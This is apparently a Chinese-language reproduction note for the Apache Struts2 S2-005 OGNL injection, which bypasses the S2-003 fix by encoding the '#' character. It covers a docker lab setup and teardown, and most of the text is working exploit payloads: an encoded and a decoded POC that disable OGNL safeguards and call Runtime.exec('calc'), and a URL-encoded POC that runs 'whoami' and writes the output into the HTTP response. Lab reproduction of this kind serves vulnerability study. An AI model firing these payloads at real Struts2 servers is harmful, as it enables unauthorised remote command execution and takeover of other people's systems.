S2-005复现
原理
修复S2-003时存在绕过,S2-003对#
过滤时忽略了Unicode编码,可以使用023或者八进制进行绕过
#### 环境准备
docker-compose up -d
漏洞验证
原始POC
1
2
3
| ('\u0023_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true
&(aaaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023vccc')(\u0023vccc\u003dnew java.lang.Boolean("false")))
&(asdf)(('\u0023rt.exec("calc")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
|
解码后
1
2
3
4
5
6
| ('#_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true
//设置allowStaticMethodAccess为true,开启后就可以执行静态方法 (vaaa)为遵循ognl语法树规则
&(aaaa)(('#context[\'xwork.MethodAccessor.denyMethodExecution\']=#vccc')(#vccc=new java.lang.Boolean("false")))
//设置denyMethodExecution为false 允许ognl自定义变量
&(asdf)(('#rt.exec("calc")')(#rt=@java.lang.Runtime@getRuntime()))=1
//执行 calc 系统命令
|
whoami POC
1
2
3
4
5
| (%27%5c43_memberAccess.allowStaticMethodAccess%27)(a)=true
&(b)((%27%5c43context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5c75false%27)(b))
&(%27%5c43c%27)((%27%5c43_memberAccess.excludeProperties%5c75@java.util.Collections@EMPTY_SET%27)(c))
&(g)((%27%5c43mycmd%5c75%5c%27whoami%5c%27%27)(d))
&(h)((%27%5c43myret%5c75@java.lang.Runtime@getRuntime().exec(%5c43mycmd)%27)(d))&(i)((%27%5c43mydat%5c75new%5c40java.io.DataInputStream(%5c43myret.getInputStream())%27)(d))&(j)((%27%5c43myres%5c75new%5c40byte[51020]%27)(d))&(k)((%27%5c43mydat.readFully(%5c43myres)%27)(d))&(l)((%27%5c43mystr%5c75new%5c40java.lang.String(%5c43myres)%27)(d))&(m)((%27%5c43myout%5c75@org.apache.struts2.ServletActionContext@getResponse()%27)(d))&(n)((%27%5c43myout.getWriter().println(%5c43mystr)%27)(d))
|
关闭环境
docker-compose down -v
Reference
http://b1ue.cn/archives/107.html
https://xz.aliyun.com/t/7966#toc-0
https://blog.csdn.net/u011721501/article/details/41626959